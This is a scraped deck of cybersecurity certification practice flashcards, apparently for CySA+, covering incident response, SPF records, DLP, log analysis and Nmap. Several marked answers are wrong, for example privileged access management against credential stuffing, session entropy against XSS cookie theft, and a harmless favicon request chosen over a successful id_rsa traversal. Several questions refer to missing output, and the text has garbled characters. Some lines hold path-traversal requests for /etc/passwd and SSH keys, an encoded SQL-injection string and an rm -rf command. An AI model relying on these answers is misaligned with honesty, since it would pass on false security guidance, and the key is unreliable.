Part 4 Flashcards

1
Q

An organization developed a comprehensive modern response policy Executive management approved the policy and its associated procedures. Which of the following activities would be MOST beneficial to evaluate personnel’s familiarity with incident

A. A simulated breach scenario evolving the incident response team

B. Completion of annual information security awareness training by ail employees

C. Tabtetop activities involving business continuity team members

D. Completion of lessons-learned documentation by the computer security incident response team E. External and internal penetration testing by a third party

A

A. A simulated breach scenario evolving the incident response team

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A security technician is testing a solution that will prevent outside entities from spoofing the company’s email domain, which is comptiA.org. The testing is successful, and the security technician is prepared to fully implement the solution. Which of the following actions should the technician take to accomplish this task?

A. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the DNS record.

B. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the email server.

C. Add TXT @ “v=spf1 mx include:_spf.comptiA.org +all” to the domain controller.

D. Add TXT @ “v=spf1 mx include:_spf.comptiA.org +all” to the web server.

A

A. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the DNS record.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

An organization needs to limit its exposure to accidental disclosure when employees send emails that contain personal information to recipients outside the company. Which of the following technical controls would BEST accomplish this goal?

A. DLP

B. Encryption

C. Data masking

D. SPF

A

A. DLP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

191.A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be depleted of resources. Which of the following BEST describes this attack?

A. Injection attack

B. Memory corruption

C. Denial of service

D. Array attack

A

B. Memory corruption

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A security analyst working in the SOC recently discovered Balances m which hosts visited a specific set of domains and IPs and became infected with malware. Which of the following is the MOST appropriate action to take in the situation?

A. implement an IPS signature for the malware and update the blacklisting for the associated domains and IPs

B. Implement an IPS signature for the malware and another signature request to Nock all the associated domains and IPs

C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains

D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the IPs and domains

A

C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Which of the following BEST articulates the benefit of leveraging SCAP in an organization’s cybersecurity analysis toolset?

A. It automatically performs remedial configuration changes to enterprise security services

B. It enables standard checklist and vulnerability analysis expressions for automation

C. It establishes a continuous integration environment for software development operations

D. It provides validation of suspected system vulnerabilities through workflow orchestration

A

B. It enables standard checklist and vulnerability analysis expressions for automation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

A Chief Security Officer (CSO) is working on the communication requirements (or an organization’s incident response plan. In addition to technical response activities, which of the following is the main reason why communication must be addressed in an effective incident response program?

A. Public relations must receive information promptly in order to notify the community.

B. Improper communications can create unnecessary complexity and delay response actions.

C. Organizational personnel must only interact with trusted members of the law enforcement community.

D. Senior leadership should act as the only voice for the incident response team when working with forensics teams.

A

B. Improper communications can create unnecessary complexity and delay response actions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

An employee in the billing department accidentally sent a spreadsheet containing payment card data to a recipient outside the organization. The employee intended to send the spreadsheet to an internal staff member with a similar name and was unaware of the mistake until the recipient replied to the message. In addition to retraining the employee, which of the following would prevent this from happening in the future?

A. Implement outgoing filter rules to quarantine messages that contain card data

B. Configure the outgoing mail filter to allow attachments only to addresses on the whitelist

C. Remove all external recipients from the employee’s address book

D. Set the outgoing mail filter to strip spreadsheet attachments from all messages.

A

B. Configure the outgoing mail filter to allow attachments only to addresses on the whitelist

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

An analyst wants to identify hosts that are connecting to the external FTP servers and what, if any, passwords are being used. Which of the following commands should the analyst use?

A. tcpdump –X dst port 21

B. ftp ftp.server –p 21

C. nmap –o ftp.server –p 21

D. telnet ftp.server 21

A

A. tcpdump –X dst port 21

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior results in the industrial generators overheating and destabilizing the power supply. Which of the following would BEST identify potential indicators of compromise?

A. Use Burp Suite to capture packets to the SCADA device’s IP.

B. Use tcpdump to capture packets from the SCADA device IP.

C. Use Wireshark to capture packets between SCADA devices and the management system.

D. Use Nmap to capture packets from the management system to the SCADA devices.

A

C. Use Wireshark to capture packets between SCADA devices and the management system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

A security analyst is investigating a system compromise. The analyst verities the system was up to date on OS patches at the time of the compromise. Which of the following describes the type of vulnerability that was MOST likely expiated?

A. Insider threat

B. Buffer overflow

C. Advanced persistent threat

D. Zero day

A

D. Zero day

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A SIEM solution alerts a security analyst of a high number of login attempts against the company’s webmail portal. The analyst determines the login attempts used credentials from a past data breach. Which of the following is the BEST mitigation to prevent unauthorized access?

A. Single sign-on

B. Mandatory access control

C. Multifactor authentication

D. Federation

E. Privileged access management

A

E. Privileged access management

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A hybrid control is one that:

A. is implemented differently on individual systems

B. is implemented at the enterprise and system levels

C. has operational and technical components

D. authenticates using passwords and hardware tokens

A

B. is implemented at the enterprise and system levels

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A bad actor bypasses authentication and reveals all records in a database through an SQL injection. Implementation of which of the following would work BEST to prevent similar attacks in

A. Strict input validation

B. Blacklisting

C. SQL patching

D. Content filtering

E. Output encoding

A

A. Strict input validation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

An organization is moving its infrastructure to the cloud in an effort to meet the budget and reduce staffing requirements. The organization has three environments: development, testing, and production. These environments have interdependencies but must remain relatively segmented. Which of the following methods would BEST secure the company’s infrastructure and be the simplest to manage and maintain?

A. Create three separate cloud accounts for each environment. Configure account peering and security rules to allow access to and from each environment.

B. Create one cloud account with one VPC for all environments. Purchase a virtual firewall and create granular security rules.

C. Create one cloud account and three separate VPCs for each environment. Create security rules to allow access to and from each environment.

D. Create three separate cloud accounts for each environment and a single core account for network services. Route all traffic through the core account.

A

C. Create one cloud account and three separate VPCs for each environment. Create security rules to allow access to and from each environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

An organization developed a comprehensive incident response policy. Executive management approved the policy and its associated procedures. Which of the following activities would be MOST beneficial to evaluate personnel’s familiarity with incident response procedures?

A. A simulated breach scenario involving the incident response team

B. Completion of annual information security awareness training by all employees

C. Tabletop activities involving business continuity team members

D. Completion of lessons-learned documentation by the computer security incident response team

E. External and internal penetration testing by a third party

A

A. A simulated breach scenario involving the incident response team

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Data spillage occurred when an employee accidentally emailed a sensitive file to an external recipient. Which of the following controls would have MOST likely prevented this incident?

A. SSO

B. DLP

C. WAF

D. VDI

A

B. DLP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Which of the following will allow different cloud instances to share various types of data with a minimal amount of complexity?

A. Reverse engineering

B. Application log collectors

C. Workflow orchestration

D. API integration

E. Scripting

A

D. API integration

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

A monthly job to install approved vendor software updates and hot fixes recently stopped working. The security team performed a vulnerability scan, which identified several hosts as having some critical OS vulnerabilities, as referenced in the common vulnerabilities and exposures (CVE) database. Which of the following should the security team do NEXT to resolve the critical findings in the most effective manner? (Choose two.)

A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.

B. Remove the servers reported to have high and medium vulnerabilities.

C. Tag the computers with critical findings as a business risk acceptance.

D. Manually patch the computers on the network, as recommended on the CVE website.

E. Harden the hosts on the network, as recommended by the NIST framework.

F. Resolve the monthly job issues and test them before applying them to the production network.

A

A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities. B. Remove the servers reported to have high and medium vulnerabilities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

210.Which of the following should be found within an organization’s acceptable use policy?

A. Passwords must be eight characters in length and contain at least one special character.

B. Customer data must be handled properly, stored on company servers, and encrypted when possible

C. Administrator accounts must be audited monthly, and inactive accounts should be removed.

D. Consequences of violating the policy could include discipline up to and including termination.

A

D. Consequences of violating the policy could include discipline up to and including termination.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should be implemented to BEST address these concerns?

A. Data masking

B. Data loss prevention

C. Data minimization

D. Data sovereignty

A

A. Data masking

22
Q

An analyst is working with a network engineer to resolve a vulnerability that was found in a piece of legacy hardware, which is critical to the operation of the organization’s production line. The legacy hardware does not have third-party support, and the OEM manufacturer of the controller is no longer in operation. The analyst documents the activities and verifies these actions prevent remote exploitation of the vulnerability. Which of the following would be the MOST appropriate to remediate the controller?

A. Segment the network to constrain access to administrative interfaces.

B. Replace the equipment that has third-party support.

C. Remove the legacy hardware from the network.

D. Install an IDS on the network between the switch and the legacy equipment.

A

A. Segment the network to constrain access to administrative interfaces.

23
Q

A security analyst is investigating an incident that appears to have started with SOL injection against a publicly available web application. Which of the following is the FIRST step the analyst should take to prevent future attacks?

A. Modify the IDS rules to have a signature for SQL injection.

B. Take the server offline to prevent continued SQL injection attacks.

C. Create a WAF rule In block mode for SQL injection

D. Ask the developers to implement parameterized SQL queries.

A

A. Modify the IDS rules to have a signature for SQL injection.

24
Q

A large amount of confidential data was leaked during a recent security breach. As part of a forensic investigation, the security team needs to identify the various types of traffic that were captured between two compromised devices. Which of the following should be used to identify the traffic? A. Carving

B. Disk imaging

C. Packet analysis

D. Memory dump

E. Hashing

A

C. Packet analysis

25
Q

An incident responder successfully acquired application binaries off a mobile device for later forensic analysis. Which of the following should the analyst do NEXT?

A. Decompile each binary to derive the source code.

B. Perform a factory reset on the affected mobile device.

C. Compute SHA-256 hashes for each binary.

D. Encrypt the binaries using an authenticated AES-256 mode of operation.

E. Inspect the permissions manifests within each application.

A

C. Compute SHA-256 hashes for each binary.

26
Q

Joe, a penetration tester, used a professional directory to identify a network administrator and ID administrator for a client’s company. Joe then emailed the network administrator, identifying himself as the ID administrator, and asked for a current password as part of a security exercise. Which of the following techniques were used in this scenario?

A. Enumeration and OS fingerprinting

B. Email harvesting and host scanning

C. Social media profiling and phishing

D. Network and host scanning

A

C. Social media profiling and phishing

27
Q

Which of the following is the use of tools to simulate the ability for an attacker to gain access to a specified network?

A. Reverse engineering

B. Fuzzing

C. Penetration testing

D. Network mapping

A

C. Penetration testing

28
Q

A small electronics company decides to use a contractor to assist with the development of a new FPGA-based device. Several of the development phases will occur off-site at the contractor’s labs. Which of the following is the main concern a security analyst should have with this arrangement? A. Making multiple trips between development sites increases the chance of physical damage to the FPGAs.

B. Moving the FPGAs between development sites will lessen the time that is available for security testing.

C. Development phases occurring at multiple sites may produce change management issues.

D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

A

D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

29
Q

A security analyst is trying to determine if a host is active on a network. The analyst first attempts the following: The analyst runs the following command next: Which of the following would explain the difference in results?

A. ICMP is being blocked by a firewall.

B. The routing tables for ping and hping3 were different.

C. The original ping command needed root permission to execute.

D. hping3 is returning a false positive.

A

A. ICMP is being blocked by a firewall.

30
Q

A cybersecurity analyst is contributing to a team hunt on an organization’s endpoints. Which of the following should the analyst do FIRST?

A. Write detection logic.

B. Establish a hypothesis.

C. Profile the threat actors and activities.

D. Perform a process analysis.

A

B. Establish a hypothesis.

31
Q

An information security analyst is compiling data from a recent penetration test and reviews the following output: The analyst wants to obtain more information about the web-based services that are running on the target. Which of the following commands would MOST likely provide the needed information?

A. ping -t 10.79.95.173.rdns.datacenters.com

B. telnet 10.79.95.173 443

C. ftpd 10.79.95.173.rdns.datacenters.com 443

D. tracert 10.79.95.173

A

B. telnet 10.79.95.173 443

32
Q

A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be compromised, the analyst runs the following commands: Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?

A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.

B. Examine the server logs for further indicators of compromise of a web application.

C. Run kill -9 1325 to bring the load average down so the server is usable again.

D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server

A

B. Examine the server logs for further indicators of compromise of a web application.

33
Q

While planning segmentation for an ICS environment, a security engineer determines IT resources will need access to devices within the ICS environment without compromising security. To provide the MOST secure access model in this scenario, the jumpbox should be __________.

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.

B. placed on the ICS network with a static firewall rule that allows IT network resources to authenticate.

C. bridged between the IT and operational technology networks to allow authenticated access.

D. placed on the IT side of the network, authenticated, and tunneled into the ICS environment.

A

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.

34
Q

A security analyst is reviewing the logs from an internal chat server. The chat.log file is too large to review manually, so the analyst wants to create a shorter log file that only includes lines associated with a user demonstrating anomalous activity Which of the following commands would work BEST to achieve the desired result?

A. grep -v chatter14 chat.log

B. grep -i pythonfun chat.log

C. grep -i javashark chat.log

D. grep -v javashark chat.log E. grep -v pythonfun chat.log

F. grep -i chatter14 chat.log

A

D. grep -v javashark chat.log

35
Q

A security analyst is evaluating two vulnerability management tools for possible use in an organization. The analyst set up each of the tools according to the respective vendor’s instructions and generated a report of vulnerabilities that ran against the same target server. Tool A reported the following: Which of the following BEST describes the method used by each tool? (Choose two.)

A. Tool A is agent based.

B. Tool A used fuzzing logic to test vulnerabilities.

C. Tool A is unauthenticated.

D. Tool B utilized machine learning technology.

E. Tool B is agent based.

F. Tool B is unauthenticated.

A

A. Tool A is agent based. F. Tool B is unauthenticated.

36
Q

A user receives a potentially malicious email that contains spelling errors and a PDF document. A security analyst reviews the email and decides to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?

A. sha256sum ~/Desktop/file.pdf

B. file ~/Desktop/file.pdf

C. strings ~/Desktop/file.pdf | grep “

A

A. sha256sum ~/Desktop/file.pdf

37
Q

While analyzing logs from a WAF, a cybersecurity analyst finds the following: ג€GET /form.php?id=463225%2b%2575%256e%2569%256f%256e%2b%2573%2574%2box3133333731,1223,1224&name=&state=ILג€ Which of the following BEST describes what th

e analyst has found? A. This is an encrypted GET HTTP request

B. A packet is being used to bypass the WAF

C. This is an encrypted packet

D. This is an encoded WAF bypass

A

D. This is an encoded WAF bypass

38
Q

A companyג€™s marketing emails are either being found in a spam folder or not being delivered at all. The security analyst investigates the issue and discovers the emails in question are being sent on behalf of the company by a third party, mail.marketing.com. Below is the existing SPF record: v=spf1 a mx -all Which of the following updates to the SPF record will work BEST to prevent the emails from being marked as spam or blocked?

A. v=spf1 a mx redirect:mail.marketing.com ?all

B. v=spf1 a mx include:mail.marketing.com -all

C. v=spf1 a mx +all

D. v=spf1 a mx include:mail.marketing.com ~all

A

D. v=spf1 a mx include:mail.marketing.com ~all

39
Q

After a breach involving the exfiltration of a large amount of sensitive data, a security analyst is reviewing the following firewall logs to determine how the breach occurred: Which of the following IP addresses does the analyst need to investigate further?

A. 192.168.1.1

B. 192.168.1.10

C. 192.168.1.12

D. 192.168.1.193

A

B. 192.168.1.10

40
Q

During an incident, a cybersecurity analyst found several entries in the web server logs that are related to an IP with a bad reputation. Which of the following would cause the analyst to further review the incident?

A. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /etc/passwdג€ 403 1023

B. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /index.html?src=../.ssh/id_rsaג€ 401 17044

C. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /a.php?src=/etc/passwdג€ 403 11056

D. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /a.php?src=../../.ssh/id_rsaג€ 200 15036

E. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /favicon.ico?src=../usr/share/iconsג€ 200 19064

A

E. BadReputationIp - - [2019-04-12 10:43Z] ג€GET /favicon.ico?src=../usr/share/iconsג€ 200 19064

41
Q

Which of the following should the analyst investigate FIRST?

A. Port 21

B. Port 22

C. Port 23

D. Port 80

A

C. Port 23

42
Q

An organization was alerted to a possible compromise after its proprietary data was found for sale on the Internet. An analyst is reviewing the logs from the next- generation UTM in an attempt to find evidence of this breach. Given the following output: Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org

B. sftp.org-dmz.org

C. 83hht23.org-int.org

D. ftps.bluemed.net

A

A. webserver.org-dmz.org

43
Q

A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output: Which of the following commands should the administrator run NEXT to further analyze the compromised system?

A. strace /proc/1301

B. rpm ג€”V openssh-server

C. /bin/ls ג€”l /proc/1301/exe

D. kill -9 1301

A

A. strace /proc/1301

44
Q

A security analyst scanned an internal company subnet and discovered a host with the following Nmap output. Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?

A. Port 22

B. Port 135

C. Port 445

D. Port 3389

A

B. Port 135

45
Q

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing

B. ARP spoofing

C. A brute-force attack

D. An SQL injection

A

C. A brute-force attack

46
Q

A security analyst needs to assess the web server versions on a list of hosts to determine which are running a vulnerable version of the software and output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap commands would BEST accomplish this goal?

A. nmap -iL webserverlist.txt -sC -p 443 -oX webserverlist.xml

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

C. nmap -iL webserverlist.txt -

F -p 443 -oX webserverlist.xml

D. nmap –takefile webserverlist.txt –outputfileasXML webserverlist.xml ג€”scanports 443

A

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

47
Q

Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

A. Ensuring the session identifier length is sufficient

B. Creating proper session identifier entropy

C. Applying a secure attribute on session cookies

D. Utilizing transport layer encryption on all requests

E. Implementing session cookies with the HttpOnly flag

A

B. Creating proper session identifier entropy

48
Q

The Chief Executive Officer (CEO) of a large insurance company has reported phishing emails that contain malicious links are targeting the entire organization. Which of the following actions would work BEST to prevent against this type of attack?

A. Turn on full behavioral analysis to avert an infection.

B. Implement an EDR mail module that will rewrite and analyze email links.

C. Reconfigure the EDR solution to perform real-time scanning of all files.

D. Ensure EDR signatures are updated every day to avert infection.

E. Modify the EDR solution to use heuristic analysis techniques for malware.

A

B. Implement an EDR mail module that will rewrite and analyze email links.

49
Q

Which of the following sources would a security analyst rely on to provide relevant and timely threat information concerning the financial services industry?

A. Real-time and automated firewall rules subscriptions

B. Open-source intelligence, such as social media and blogs

C. Information sharing and analysis membership

D. Common vulnerability and exposure bulletins

A

C. Information sharing and analysis membership

50
Q

The Chief Information Officer (CIO) for a large manufacturing organization has noticed a significant number of unknown devices with possible malware infections are on the organization’s corporate network. Which of the following would work BEST to prevent the issue?

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.

B. Segment the network to isolate all systems that contain highly sensitive information, such as intellectual property.

C. Implement certificate validation on the VPN to ensure only employees with the certificate can access the company network.

D. Update the antivirus configuration to enable behavioral and real-time analysis on all systems within the network.

A

A. Reconfigure the NAC solution to prevent access based on a full device profile and ensure antivirus is installed.

51
Q
A